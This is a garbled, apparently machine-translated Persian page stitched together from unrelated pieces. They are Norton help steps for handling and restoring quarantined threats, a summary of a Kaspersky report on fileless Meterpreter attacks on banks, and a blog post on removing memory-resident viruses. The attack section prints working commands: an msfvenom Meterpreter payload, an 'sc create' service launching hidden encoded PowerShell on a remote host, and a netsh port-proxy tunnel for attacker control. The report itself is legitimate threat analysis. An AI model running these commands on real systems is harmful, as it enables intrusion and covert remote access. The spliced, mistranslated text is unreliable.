تهدیدهای امنیتی دستگاه شناسایی شده توسط نورتون را مشاهده و تعمیر کنید. بدافزار «نامرئی» فایل‌ها را ترک نمی‌کند، در حافظه پنهان می‌شود و به شرکت‌های بزرگ حمله می‌کند. تصحیح تهدیداتی که در حین اسکن حذف نشده‌اند.

درباره یک کمپین بدافزار جدید هیجان انگیز که بانک ها، مخابرات، سازمان های دولتی و سایر شرکت ها و سازمان ها را در بیش از چهل کشور در سراسر جهان تحت تاثیر قرار داده است.

تحلیلگران تیم GreAT می نویسند که متخصصان تیم امنیت بانکی اولین کسانی بودند که متوجه این تهدید شدند: سپس در حافظه فیزیکیکنترل کننده دامنه کد Meterpreter را پیدا کرد. محصولات آزمایشگاه کسپرسکی مشکلاتی مانند MEM: Trojan.Win32.Commeter و MEM: Trojan.Win32.Metasploit را تشخیص می دهند. هنگامی که تحلیلگران شروع به درک کردند و سعی کردند بفهمند کد از کجا آمده است، اسکریپت های PowerShell را نیز در حافظه پیدا کردند. رجیستری ویندوزو ابزار NETSH که برای تونل کردن ترافیک به سرور فرمان و کنترل مهاجمان استفاده می شد.

به این حملات، حملات بدون فایل گفته می شود، به این معنی که بدافزار هیچ فایلی را روی هارد دیسک قرار نمی دهد، در عوض، محموله مستقیماً به حافظه تزریق می شود و در داخل RAM وجود دارد. البته تشخیص و ردیابی چنین حمله ای بسیار دشوار است.

طرح حمله

محققان توضیح می دهند که چارچوب معروف Metasploit می تواند برای ایجاد اسکریپت ها، مانند مثال زیر، استفاده شود.

اسکریپت هایی مانند این به تزریق Meterpreter به RAM کمک می کنند. Msfvenom از Metasploit می تواند برای تولید آنها استفاده شود:

Msfvenom -p windows / meterpreter / bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd

هنگامی که اسکریپت تولید می شود، مهاجمان از Windows SC برای نصب سرویس مخرب بر روی میزبان هدف استفاده می کنند (که در نهایت اسکریپت فوق را اجرا می کند). برای مثال می توان این کار را با استفاده از دستور زیر انجام داد:

sc \\ target_name ایجاد ATITscUA binpath = "C: \ Windows \ system32 \ cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA..." شروع = دستی

مرحله بعدی پیکربندی تونل سازی است تا دستگاه آلوده برای میزبان راه دور قابل دسترسی باشد. برای انجام این کار، مهاجمان از دستور زیر استفاده می کنند:

پورت پروکسی رابط netsh add v4tov4 listenport = 4444 Connectaddress = 10.10.1.12 Connectport = 8080 listenaddress = 0.0.0.0

در نتیجه، تمام ترافیک شبکه از 10.10.1.11:4444 به 10.10.1.12:8080 هدایت می شود. این تکنیک به شما امکان می دهد یک تونل پروکسی ایجاد کنید که از طریق آن مجرمان می توانند از راه دور میزبان آلوده به PowerShell را کنترل کنند.

تحلیلگران اشاره می کنند که استفاده از SC و NETSH به امتیازات مدیر در هاست های محلی و راه دور نیاز دارد. استفاده از اسکریپت های مخرب PowerShell همچنین مستلزم افزایش امتیازات و تغییرات در خط مشی اجرا است. برای انجام این کار، مهاجمان از دامپر اعتبار Mimikatz استفاده می کنند و رمزهای عبور را از حساب های موجود در ماشین محلی و ایستگاه های کاری اطراف جمع آوری می کنند.

با مطالعه دقیق حمله به یکی از بانک های آسیب دیده، محققان به این نتیجه رسیدند که اپراتورهای این کمپین از دامنه های سطح سوم و همچنین دامنه هایی در مناطق .GA، .ML، .CF استفاده می کنند. واقعیت این است که چنین دامنه هایی رایگان هستند، به این معنی که مهاجمان اطلاعات WHOIS را پشت سر نمی گذارند.

خلاصه کردن تمام موارد فوق (با استفاده از متاسپلویت و استاندارد برنامه های کاربردی ویندوزدامنه های بدون اطلاعات WHOIS)، محققان به این نتیجه رسیدند که دست خط مهاجمان ناشناس بسیار شبیه به کار گروه هایی مانند GCMAN و Carbanak است. با این حال، هیچ مدرک مستقیمی وجود ندارد، بنابراین نمی توان این حملات خاموش را به گروه خاصی مرتبط کرد.

«تکنیک‌هایی مانند آنچه در این گزارش توضیح داده شد، به ویژه [زمانی که حملات انجام می‌شود] علیه اهداف بزرگ در صنعت بانکداری رایج‌تر می‌شوند. متأسفانه، استفاده از ابزارهای ساده، همراه با ترفندهای مختلف، تشخیص [چنین حملات] را بسیار دشوار می کند.

هنگامی که نورتون تهدیدی را شناسایی می کند، برنامه به طور خودکار آن را حذف می کند، مگر اینکه مداخله شما برای تعیین نحوه مدیریت تهدید ضروری باشد. در چنین مواردی، نورتون یک اعلان "تهدید شناسایی شده" یا "خطر امنیتی" را با گزینه های موجود برای پاسخ به تهدید نمایش می دهد.

تهدیدهایی را که به طور خودکار در حین اسکن رفع شده اند مشاهده کنید

    نورتون را شروع کنید.

    امنیت دستگاه، روی Open کلیک کنید.

    در پنجره گزارش امنیتی از بین بردن تهدیدات امنیتی.

    یک تهدید را از لیست انتخاب کنید و اقدامات انجام شده را در قسمت Details مرور کنید.

در برخی موارد، به‌جای رفع خودکار یک تهدید، نورتون توصیه می‌کند که اقدام خاصی برای رفع آن انجام دهید.

رفع تهدیداتی که در حین اسکن برطرف نشدند

    نورتون را شروع کنید.

    اگر پنجره نورتون من در کنار امنیت دستگاه، روی Open کلیک کنید.

    در پنجره اصلی نورتون، روی Security دوبار کلیک کنید و سپس History را انتخاب کنید.

    در پنجره گزارش امنیتیدر فهرست نمایش، را انتخاب کنید تهدیدات امنیتی حل نشده.

    اگر لیست حاوی تهدیدات حل نشده است، تهدید مورد نظر خود را انتخاب کنید.

اگر دلیلی وجود دارد که باور کنید سیستم شما آلوده شده است، نرم افزار Norton Power Eraser را اجرا کنید. نورتون پاور پاک کن است ابزار قدرتمندحذف بدافزار برای خلاص شدن از قوی ترین تهدیدات امنیتی. برای اطلاعات بیشتر به سند مراجعه کنید Norton Scan را برای تهدیدات رایانه شخصی اجرا کنید

Norton Power Eraser یک ابزار تهاجمی حذف بدافزار است. گاهی همراه با بد افزارنورتون پاور پاک کن می تواند فایل های مورد اعتماد را حذف کند، بنابراین قبل از حذف هر فایلی، نتایج اسکن را به دقت بررسی کنید.

به طور پیش فرض، نورتون تهدیدات امنیتی را از رایانه شما حذف می کند و آنها را قرنطینه می کند. اگر دلیلی برای این باور دارید که فایلی به اشتباه حذف شده است، می توانید آن را از قرنطینه به محل اصلی خود بازگردانید و از اسکن های بعدی حذف کنید.

بازیابی فایل از قرنطینه

    نورتون را شروع کنید.

    اگر پنجره نورتون من در کنار امنیت دستگاه، روی Open کلیک کنید.

    در پنجره اصلی نورتون، روی Security کلیک کنید و سپس History را انتخاب کنید.

    در پنجره گزارش امنیتیمنوی نمایش را باز کرده و گزینه قرنطینه را انتخاب کنید.

    فایلی را که می خواهید بازیابی کنید انتخاب کنید.

    در قسمت Details روی گزینه ها کلیک کنید.

    در پنجره تهدید شناسایی شدهتیم را انتخاب کنید این فایل را بازیابی و حذف کنید.

    در پنجره بازگرداندن از قرنطینهروی دکمه بله کلیک کنید.

    در پنجره Browse for folder، یک پوشه یا درایو را برای قرار دادن فایل بازیابی شده انتخاب کنید و روی OK کلیک کنید.

ویروس در حافظه دسترسی تصادفی، این پدیده کاملاً ناخوشایند است و متاسفانه نادر نیست. اغلب ما یک فایل مخفی می بینیم اما به هیچ وجه نمی توانیم آن را حذف کنیم - همه ظاهر می شوند و ظاهر می شوند یا خود اتاق عمل سیستم ویندوزاجازه انجام آن را نمی دهد.

به هر حال، در موارد بسیار بیشتر خود را نشان می دهد تنظیم اشتباهآنتی ویروس یا عدم وجود آن اگر چنین شرایطی دارید توصیه می کنم مقاله نصب و پیکربندی آنتی ویروس در ویندوز را مطالعه کنید. قبل از حذف یک ویروس از RAM، باید بفهمید که چه اتفاقی برای برنامه آنتی ویروس نصب شده بر روی رایانه شما می افتد. به احتمال زیاد، برنامه آنتی ویروس شما توسط ویروس ظاهر شده "خراب" شده است. این امکان وجود دارد که در زرادخانه امضای برنامه آنتی ویروس شما روشی برای پاک کردن کامل ویروس از مجموعه به موقع وجود نداشته باشد و برنامه فقط سعی در حذف آن داشته باشد. عفونت ویروسینه خود ویروس

اغلب مواقعی پیش می آید که یک ویروس برنامه ها و فایل های اضافی را برای کار خود منتقل می کند یا به طور خودکار شروع به کار می کند و اکنون برنامه آنتی ویروس این کپی ها را شناسایی می کند اما خود منبع (ویروس) را شناسایی نمی کند و در بیشتر موارد نمی تواند با آن مقابله کند. با آن.

  1. ما برنامه آنتی ویروس نصب شده را حذف می کنیم (با استفاده از حذف کننده - اضافه کردن / حذف برنامه ها) ، در اینجا بی فایده است.
  2. Ccleaner را از اینترنت دانلود و نصب کنید. برای شروع، ابتدا پوشه های temp را پاک می کنیم. این نرم افزار مناسب است کاربران عادیبر این اساس امکان قرار دادن تمام چک باکس ها وجود دارد تنظیمات - کاربرداده ها را پاک نمی کند! در مقاله پاکسازی رجیستری بیشتر در مورد برنامه نوشتم.
  3. سپس ابزار پاکسازی ویروس برای کمک به ما مفید خواهد بود. من در مورد آنها در مقاله نوشتم - ابزارهای رایگان برای از بین بردن ویروس ها. ما هر کدام را انتخاب می کنیم. مثلا برنامه Dr.web Cure it را از اینترنت دانلود و نصب کنید.
  4. ما به روز رسانی را نصب می کنیم، یکی از دو اسکن (سریع یا کامل) را راه اندازی می کنیم. اسکن سریع، در اصل، یک نتیجه موثر می دهد. ما تمام ویروس هایی که شناسایی شده اند را حذف می کنیم. ما کامپیوتر را راه اندازی مجدد می کنیم.
  5. دانلود آنتی ویروس جدید اساساً مهم است! اگر به مشکل خوردید، آنتی ویروس Eset NOD32 را نصب کرده بودید، سپس Avast یا Avira را نصب کنید، اگر Avast نصب بود، Eset یا هر آنتی ویروس دیگری را که انتخاب کردید نصب کنید.
  6. تفسیر چنین اقداماتی بسیار آسان است، برنامه آنتی ویروسی که به احتمال زیاد داشتید آسیب دیده است، داده های موجود در رجیستری این فرصت را داشتند که باقی بمانند، و این منجر به عملکرد نادرست برنامه آنتی ویروس می شود، به خصوص که این برنامه آنتی ویروس این کار را انجام نداده است. یک تهدید از اینترنت را در رایانه خود پیدا کنید.